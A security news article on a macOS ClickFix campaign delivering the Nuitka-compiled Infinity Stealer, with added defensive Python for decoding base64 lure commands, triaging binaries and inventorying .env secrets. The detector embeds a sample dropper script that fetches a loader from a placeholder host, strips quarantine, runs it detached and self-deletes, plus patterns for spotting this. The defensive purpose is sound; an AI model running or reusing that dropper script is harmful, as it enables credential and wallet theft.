ClickFix: The New Threat to macOS Security

A sophisticated information-stealing malware family known as Infinity Stealer is now targeting macOS, delivering a Python payload that has been compiled into a native executable with Nuitka, an open-source Python-to-C compiler.

The campaign uses the ClickFix technique: a fake CAPTCHA page that imitates Cloudflare's human-verification check tricks users into running a malicious command themselves.

According to researchers at Malwarebytes, this is the first reported macOS campaign that pairs ClickFix delivery with a Python info-stealer compiled using Nuitka.

Nuitka translates the Python source into C and compiles it with a native toolchain, so the result is a genuine machine-code binary rather than a script, which makes it considerably more resilient to static analysis.

PyInstaller, by contrast, bundles the CPython interpreter together with the script's compiled bytecode in an archive appended to the executable; that bytecode can be extracted and decompiled back to something close to the original source. Nuitka leaves no such bytecode layer, so reverse engineering has to start from native code, which is far more laborious.

“The final payload is coded in Python and compiled with Nuitka, creating a native macOS binary that enhances its resistance to analysis and detection compared to traditional Python-based malware,” stated Malwarebytes.

Understanding the Attack Chain

The attack begins with a ClickFix lure on the domain update-check[.]com that masquerades as a Cloudflare human-verification page. It instructs the visitor to complete the "challenge" by pasting a base64-encoded command into the macOS Terminal; once decoded, the command fetches the next stage with curl. Because the victim runs it themselves, the payload never goes through the browser download path, so the Gatekeeper prompt that a downloaded application would trigger never appears.

Figure: the ClickFix step used in Infinity attacks (source: Malwarebytes)

The decoded Bash script writes stage 2 (the Nuitka loader) to /tmp, removes the com.apple.quarantine extended attribute from it (a belt-and-braces step, since files fetched with curl normally carry no quarantine attribute), and launches it detached with 'nohup' so that it survives the Terminal session. It passes the command-and-control (C2) address and an access token to the loader through environment variables, deletes itself, and closes the Terminal window.
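The two paragraphs above describe exactly what a defender can key on: a base64 blob piped into a shell, which when unwrapped fetches something with curl, stages it under /tmp, strips the quarantine attribute and detaches it with nohup. The following is an added example, not Malwarebytes' code or anything from the campaign: it unwraps one or more `echo <base64> | base64 -d` layers from a recorded command line (as an EDR or the macOS unified log would capture it) and scores the decoded text against those behaviours. The sample command lines and the stage-1 script they wrap are constructed to model the described behaviour; the hostnames are placeholders, not the real infrastructure, and the scoring threshold is my assumption.

```python
import base64
import binascii
import re

# Constructed sample stage-1 script, modelled on the behaviour described above
# (download to /tmp, strip quarantine, run detached with nohup, pass C2 and token
# as environment variables, self-delete, close the Terminal window). Hostnames are
# placeholders, not the campaign's infrastructure.
STAGE1_SCRIPT = """\
curl -fsSL https://update-check.example/loader -o /tmp/.uh
xattr -d com.apple.quarantine /tmp/.uh
C2=https://c2.example TOKEN=deadbeef nohup /tmp/.uh >/dev/null 2>&1 &
rm -- "$0"; osascript -e 'tell application "Terminal" to close front window'
"""


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed command lines, as an EDR or the unified log might record them.
_INNER = f"echo {_b64(STAGE1_SCRIPT)} | base64 -d | bash"
SAMPLE_CMDLINES = [
    _INNER,                                            # one base64 layer
    f'bash -c "$(echo {_b64(_INNER)} | base64 -d)"',  # two layers
    "echo dGhpcyBpcyBhIHRlc3Q= | base64 -d",           # benign: decoding a value
]

# `echo <b64> | base64 -d` (macOS base64 also accepts -D and --decode)
B64_PIPE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|-D|--decode)\b"
)

# Behaviours from the decoded text; each one alone is common in legitimate scripts.
INDICATORS = [
    ("fetches a payload with curl/wget", re.compile(r"\b(?:curl|wget)\b")),
    ("stages a file under /tmp", re.compile(r"/tmp/")),
    ("strips the Gatekeeper quarantine xattr",
     re.compile(r"xattr\s+-d\s+com\.apple\.quarantine|xattr\s+-c\b")),
    ("detaches the process with nohup", re.compile(r"\bnohup\b")),
    ("deletes its own script file", re.compile(r"\brm\b[^\n]*\$0")),
    ("closes the Terminal window via osascript", re.compile(r"osascript[^\n]*Terminal")),
]


def decode_layers(cmdline: str, max_depth: int = 4) -> tuple[str, int]:
    """Replace each `echo <b64> | base64 -d` with its decoded text, outermost first.

    Returns the unwrapped text and how many layers were removed.
    """
    text, depth = cmdline, 0
    while depth < max_depth:
        m = B64_PIPE.search(text)
        if m is None:
            break
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            break  # not really base64; leave the text as it is
        text = text[: m.start()] + decoded + text[m.end():]
        depth += 1
    return text, depth


def analyze(cmdline: str) -> dict:
    """Score a recorded command line; base64 alone is never enough to flag it."""
    decoded, layers = decode_layers(cmdline)
    hits = [name for name, rx in INDICATORS if rx.search(decoded)]
    # Assumed threshold: three behaviours, or two behaviours hidden behind encoding.
    suspicious = len(hits) >= 3 or (layers > 0 and len(hits) >= 2)
    return {"verdict": "suspicious" if suspicious else "benign",
            "layers": layers, "indicators": hits, "decoded": decoded}


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        r = analyze(line)
        print(f"{r['verdict']:10} layers={r['layers']} {r['indicators']}")
```

The same unwrapping step is what a user should do by hand before pasting anything a web page hands them: decode the blob and read the script, rather than trusting the page's description of what it does.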

The Nuitka loader is an 8.6 MB Mach-O binary that embeds a zstd-compressed archive (about 35 MB once decompressed) holding stage 3, UpdateHelper.bin, which is the Infinity Stealer itself.
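The packaging distinction drawn earlier (PyInstaller's extractable bytecode archive versus Nuitka's native binary with a compressed payload) is also the first thing to settle when a sample like this loader lands on an analyst's desk. The following is an added triage helper of my own, not Malwarebytes' tooling: it checks a file for a Mach-O header, for PyInstaller's CArchive cookie (the `MEI\x0c\x0b\x0a\x0b\x0e` marker from PyInstaller's own archive reader), and for zstd frame magic (0xFD2FB528, stored little-endian). The three sample blobs are constructed in the code; a real loader would be read with `triage_file`. Matching four magic bytes is a heuristic, so the result is a starting point for analysis, not a verdict.

```python
import re

# Mach-O magic values as they appear in the first four bytes of a file.
MACHO_MAGICS = {
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit",
    b"\xce\xfa\xed\xfe": "Mach-O 32-bit",
    b"\xca\xfe\xba\xbe": "Mach-O universal (fat) binary",
}
# PyInstaller CArchive cookie (PyInstaller/archive/readers.py): marks the bundled
# interpreter + bytecode archive that pyinstxtractor-style tools unpack.
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# zstd frame magic number 0xFD2FB528 (RFC 8878), little-endian on disk.
ZSTD_FRAME_MAGIC = b"\x28\xb5\x2f\xfd"


def triage(blob: bytes) -> dict:
    """Classify a binary's packaging from embedded markers (heuristic)."""
    fmt = MACHO_MAGICS.get(blob[:4], "not a Mach-O header")
    zstd_offsets = [m.start() for m in re.finditer(re.escape(ZSTD_FRAME_MAGIC), blob)]
    has_pyinstaller = PYINSTALLER_MAGIC in blob
    if has_pyinstaller:
        packaging = ("PyInstaller bundle: interpreter plus bytecode archive; "
                     "bytecode is recoverable and decompilable")
    elif zstd_offsets:
        trailing = len(blob) - zstd_offsets[0]
        packaging = (f"native binary with an embedded zstd payload "
                     f"({trailing} bytes from the first frame); consistent with a "
                     f"Nuitka onefile loader, decompress and inspect the payload")
    else:
        packaging = "no embedded-archive marker found; treat as plain native code"
    return {
        "format": fmt,
        "pyinstaller": has_pyinstaller,
        "zstd_frame_offsets": zstd_offsets,
        "packaging": packaging,
    }


def triage_file(path: str) -> dict:
    with open(path, "rb") as fh:
        return triage(fh.read())


# Constructed samples: a minimal Mach-O-looking header followed by a fake body.
def _fake_macho(body: bytes) -> bytes:
    return b"\xcf\xfa\xed\xfe" + b"\x00" * 60 + body


SAMPLE_NUITKA_LIKE = _fake_macho(b"loader code" + ZSTD_FRAME_MAGIC + b"\x00" * 100)
SAMPLE_PYINSTALLER_LIKE = _fake_macho(b"interpreter" + b"\x00" * 50 + PYINSTALLER_MAGIC + b"\x00" * 24)
SAMPLE_PLAIN = _fake_macho(b"\x90" * 200)

if __name__ == "__main__":
    for name, blob in [("nuitka-like", SAMPLE_NUITKA_LIKE),
                       ("pyinstaller-like", SAMPLE_PYINSTALLER_LIKE),
                       ("plain", SAMPLE_PLAIN)]:
        r = triage(blob)
        print(f"{name:17} {r['format']:30} {r['packaging']}")
```

On a real 8.6 MB loader the interesting output is the zstd offset: carving from there and decompressing is how the stage-3 archive is reached, and the size reported by `triage` should roughly match the gap between the binary's size and the decompressed archive the researchers describe.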

Figure: the malware's disassembly view (source: Malwarebytes)

Before harvesting any data, the malware runs anti-analysis checks to determine whether it is running inside a virtual machine or a sandbox.

Malwarebytes' analysis found that the Python 3.11 payload can capture screenshots and collect a range of sensitive data, including:

  • User credentials from Chromium-based browsers and Firefox
  • Entries from macOS Keychain
  • Cryptocurrency wallet information
  • Plaintext secrets found in developer files like .env
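Because the stealer reads .env files as plaintext, a useful defensive check is to know what such files on a machine would give away if collected. The following is an added example of mine, not Malwarebytes' code or anything from the malware: it parses a constructed .env file (the AWS and Stripe values are the placeholder examples from those vendors' documentation; the rest is made up) and produces a redacted inventory of values that look like secrets. The key-name patterns and the 32-character length threshold are my assumptions.

```python
import re

# Constructed sample .env, the kind of developer file the stealer harvests.
SAMPLE_DOTENV = """\
# local dev settings (constructed sample)
APP_ENV=development
DATABASE_URL="postgres://app:hunter2@localhost:5432/app"
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
STRIPE_API_KEY='sk_test_4eC39HqLyjWDarjtT1zdp7dc'  # test-mode key
TELEGRAM_BOT_TOKEN=123456789:AAExampleBotTokenValue_not_real
PORT=8080
"""

LINE_RX = re.compile(r"^(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$")
# Assumed name patterns that usually mark a secret.
SECRET_NAME_RX = re.compile(r"secret|token|passw(or)?d|api_?key|private_?key|mnemonic|seed_?phrase", re.I)
# user:password@ inside a URL, e.g. a database DSN.
URL_CREDS_RX = re.compile(r"://[^/:@\s]+:[^@\s]+@")
# Long opaque strings are worth listing even under an innocuous name.
HIGH_ENTROPY_RX = re.compile(r"[A-Za-z0-9+/=_\-]{32,}")


def parse_dotenv(text: str) -> dict[str, str]:
    """Parse KEY=VALUE lines, honouring `export`, quoting and trailing comments."""
    env: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RX.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if value[:1] in ("'", '"'):
            # Quoted value: take everything up to the matching quote, ignore the rest.
            quote = value[0]
            end = value.find(quote, 1)
            value = value[1:end] if end != -1 else value[1:]
        else:
            # Unquoted value: a trailing " # ..." is a comment.
            value = value.split(" #", 1)[0].rstrip()
        env[key] = value
    return env


def redact(value: str) -> str:
    """Show only enough of a value to recognise it; never echo the secret itself."""
    if len(value) <= 8:
        return "*" * len(value)
    return f"{value[:4]}...{value[-2:]}"


def inventory(text: str) -> list[dict]:
    """List the entries an attacker reading this file would get, redacted."""
    findings = []
    for key, value in parse_dotenv(text).items():
        reasons = []
        if SECRET_NAME_RX.search(key):
            reasons.append("secret-like name")
        if URL_CREDS_RX.search(value):
            reasons.append("credentials embedded in URL")
        if HIGH_ENTROPY_RX.fullmatch(value):
            reasons.append("long opaque value")
        if reasons and value:
            findings.append({"key": key, "preview": redact(value),
                             "length": len(value), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in inventory(SAMPLE_DOTENV):
        print(f"{f['key']:22} {f['preview']:14} len={f['length']:3} {', '.join(f['reasons'])}")
```

Run over a developer's home directory, the same inventory tells you which credentials to rotate first after an incident like this one; the DATABASE_URL case shows why matching on key names alone is not enough.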

All stolen data is sent to the C2 server over HTTP POST requests, and the operators receive a Telegram notification once exfiltration completes.

Malwarebytes notes that threats like Infinity Stealer show macOS-specific malware becoming more sophisticated and more targeted.

Users should never paste Terminal commands from a website unless they understand exactly what each part does. A base64 blob piped into bash is a command whose effect cannot be judged by looking at it, and no legitimate human-verification check requires one.
